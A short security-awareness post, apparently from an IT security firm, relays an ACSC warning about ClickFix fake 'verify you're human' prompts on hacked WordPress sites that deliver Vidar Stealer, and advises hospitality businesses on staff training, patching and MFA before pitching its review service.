Fake ‘verify you’re human’ pop-ups are hijacking hospitality sites

The Australian Signals Directorate’s Cyber Security Centre is warning about a fast-spreading attack called ClickFix, which uses hacked Australian business websites to push data-stealing malware. As the ACSC explains, attackers break into legitimate sites — often WordPress — and inject code that shows visitors a fake “verify you are human” box. Click it, and you’re told to paste a command into Windows. Do that, and you’ve just installed Vidar Stealer, which scrapes saved passwords, browser data and payment details.

For hospitality, this lands on two fronts. First, your own website. Cafes, restaurants, pubs and hotels lean heavily on WordPress for menus, bookings and gift cards, and an unpatched plugin is exactly how these crews get in. If your site is the one serving the fake prompt, it’s your customers being attacked and your name attached to it. Second, your team. Staff hopping between supplier portals, booking platforms and socials on the same machine that runs your POS are prime targets — and a stealer on a back-office PC can reach card and customer data fast.

What to do: tell your team the rule in plain terms — no website should ever ask you to open PowerShell or paste a command to “prove you’re human.” That’s always an attack. Keep WordPress core, themes and plugins patched, delete the ones you don’t use, and put multi-factor authentication on the admin login. On the device side, restricting who can run scripts shuts ClickFix down before it starts.

If you’re not sure whether your site or POS network would catch this, it’s worth a look. Our hospitality IT security team can review your setup and close the gaps.